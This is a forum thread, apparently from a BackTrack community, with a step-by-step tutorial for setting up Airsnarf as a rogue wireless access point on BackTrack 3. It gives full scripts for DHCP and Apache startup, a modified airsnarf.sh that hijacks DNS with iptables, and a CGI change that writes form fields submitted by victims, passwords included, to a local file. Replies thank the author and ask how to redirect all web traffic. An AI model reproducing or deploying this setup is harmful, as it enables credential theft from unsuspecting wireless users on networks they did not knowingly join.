Why copy all the files across ???? Just modify
CheersCode:# here are some variables you may want to edit WWW_ROOT="/var/www/htdocs" CGI_ROOT="/var/www/cgi-bin" LOCAL_CFG="./cfg"
Airsnarf working on bt3 with atheros card
This guide has been put together from a number of different guides tested on BT3 works great. I am using proxim8470-WD card
1st boot into backtrack 3
make dir in /var/www called html
make a dir in /var/state called dhcp
download dhcp-3.0.5-i486-2.tgz
tar -zxvf dhcp-3.0.5-i486-2.tgz
touch /var/state/dhcp/dhcpd.leases
next open kwrite and make a file called in /etc/rc.d/rc.dhcpd
open file put this in there and save it
#!/bin/sh
#
# /etc/rc.d/rc.dhcpd
#
# Start/stop/restart the Samba SMB file/print server.
#
# To make Samba start automatically at boot, make this
# file executable: chmod 755 /etc/rc.d/rc.samba
#
dhcpd_start() {
if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
echo "Starting Dhcp..."
/usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
fi
}
dhcpd_stop() {
killall dhcpd
}
dhcpd_restart() {
dhcpd_stop
sleep 2
dhcpd_start
}
case "$1" in
'start')
dhcpd_start
;;
'stop')
dhcpd_stop
;;
'restart')
dhcpd_restart
;;
*)
# Default is "start", for backwards compatibility with previous
# Slackware versions. This may change to a 'usage' error someday.
dhcpd_start
esac
then create another file in /ect/rc.d/rc.httpd
open the file put this in there then save it
#!/bin/sh
#
# /etc/rc.d/rc.httpd
#
# Start/stop/restart the Apache web server.
#
# To make Apache start automatically at boot, make this
# file executable: chmod 750 /etc/rc.d/rc.httpd
#
conffile=/etc/httpd/httpd.conf
function start() {
if grep -q "^Include /etc/apache/mod_ssl.conf" $conffile ; then
/usr/sbin/apachectl startssl
else
/usr/sbin/apachectl start
fi
}
function stop() {
/usr/sbin/apachectl stop
}
function restart() {
/usr/sbin/apachectl restart
}
# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
*)
echo "usage $0 start|stop|restart" ;;
esac
chmod 755 /etc/rc.d/rc.httpd
chmod 755 /etc/rc.d/rc.dhcpd
goto airsnarf directory /pentest/wireless/airsnarf open airsnarf and replace with this
#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.
echo "Airsnarf - A rogue AP setup utility."
echo "0.2"
echo "The Shmoo Group"
echo "------------------------------------"
# here are some variables you may want to edit
WWW_ROOT="/var/www/html"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"
# specify another config dir with a command line arg if you want
if [ $1 ]
then
LOCAL_CFG="$1"
fi
source $LOCAL_CFG/airsnarf.cfg
# create the dhcpd.conf
echo -n "Creating dhcpd.conf..."
sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
echo "Done."
# copy over the www stuff
echo -n "Building the captive portal..."
cp $LOCAL_CFG/html/* $WWW_ROOT
cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
chmod +x $CGI_ROOT/*
echo "Done."
# set our wireless parameters
echo -n "Setting the wireless parameters..."
ifconfig $ROGUE_INTERFACE down
wlanconfig $ROGUE_INTERFACE destroy
wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
ifconfig $ROGUE_INTERFACE up
iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
echo "Done."
# set our ip and default route
echo -n "Setting the ip address and default route..."
ifconfig $ROGUE_INTERFACE $ROGUE_GW
route add -net 0.0.0.0 gw $ROGUE_GW
echo "Done."
# restart some services
/usr/sbin/dhcpd -cf /etc/dhcpd.conf
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart
# set up the firewall to redirect
echo -n "Setting up firewall to redirect DNS..."
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
# dammit, I swear this used to work with just an OUTPUT rule...
iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
--to $ROGUE_GW
echo "Done."
# start the local dns resolver
echo "Starting local DNS resolver..."
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl
now open cfg file in airsnarf folder and edit airsnarf.cfg
replace with
ROGUE_SSID="ap name"
ROGUE_NET="192.168.1."
ROGUE_GW="192.168.1.254"
ROGUE_INTERFACE="ath0"
#export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE
Now for saving to a file tmp/airsnarf_pwds.txt
open the airsnarf-0.2/cfg/cgi bin edit airsnarf.cgi
comment out(or delete) everything from "$mailprog = '/usr/sbin/sendmail';" until "close(MAIL);"
replace with
open (MYFILE, '>>/tmp/airsnarf_pwds.txt');
foreach $key (keys(%FORM)) {
print MYFILE "$key = $FORM{$key}\n";
print MYFILE "----------------------\n";
}
;
save file
now run airsnarf and try to connect you will get it works on screen dont worry
goto /var/www/html and copy to /var/www/htdocs Try to connect now from windows box ect then check passwords
Why copy all the files across ???? Just modify
CheersCode:# here are some variables you may want to edit WWW_ROOT="/var/www/htdocs" CGI_ROOT="/var/www/cgi-bin" LOCAL_CFG="./cfg"
Thanks for the info Dr_GrEeN, I have done that now i should have noticed that lol
Good tut dapirates. I always loved a lil airsnarfin. Well airsnarfin at my house with my equipment.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
this topic usefull
i will test this after
Thanks for the info- I'm going to have to give this a try when I get BT3 up and running on my laptop with a PCMCIA slot. Anyone had any luck using airsnarf with a RT75 USB chipset? I'd love to get it working on my new laptop that doesn't have a PCMCIA slot for my atheros chip.
bump.....................
I have made this video Airsnarfing on Backtrack 3 and also uploaded all files needed to rapidshare
http://dapirates1.blip.tv/#650915
I hope it comes in handy to some of you.
My life is a living Hell, Day by Day fixing broken Windows Boxes (will it ever end)
Bump da Bump? Anyone have any modifications for this that will work for the USB drivers? My new laptop doesn't support PCMCIA so I can't use my Atheros card any longer.I've been using the rausb0 device through VMWare. Anyone else in the same boat?
This is a fantastic guide, I followed it closely and it took awhile but things eventually worked. I have one query though. How do you make all HTML requests go to the gateway address, I got everything working just like yours and when I connect to the rogue AP I'm not diected to anything, just get blank pages, the only page that works is the rogue AP address. Is there anyway to redirect all HTML requests to the local server. This might be an apache thing, I've never been great with apache
Posting Permissions